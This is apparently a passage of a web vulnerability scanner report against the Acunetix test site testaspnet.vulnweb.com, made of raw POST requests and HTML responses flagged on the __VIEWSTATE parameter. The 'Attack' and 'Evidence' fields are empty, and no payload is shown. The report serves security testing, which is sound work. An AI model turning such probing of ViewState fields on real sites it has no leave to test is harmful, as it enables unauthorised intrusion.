Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8308&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAz7d2otoIZGRkJPAa1EsC4ttFEK7RUEWe3yV6%2BpM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLMmsnmCgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLnkPsvfEJ0WTxcTo1HQfGJUrNzfg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:42 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAz7d2otoIZGRkJPAa1EsC4ttFEK7RUEWe3yV6+pM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLMmsnmCgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLnkPsvfEJ0WTxcTo1HQfGJUrNzfg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:White" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8323&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAATRArtoIZGRknSc84mEScHlDiNbfgg26UqYjVd4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLjpdGNBwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLRr9I8yW1cSiQ7Ft7W0vUw6%2Fg72w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:05 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAATRArtoIZGRknSc84mEScHlDiNbfgg26UqYjVd4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjpdGNBwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLRr9I8yW1cSiQ7Ft7W0vUw6/g72w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:White" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1089 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
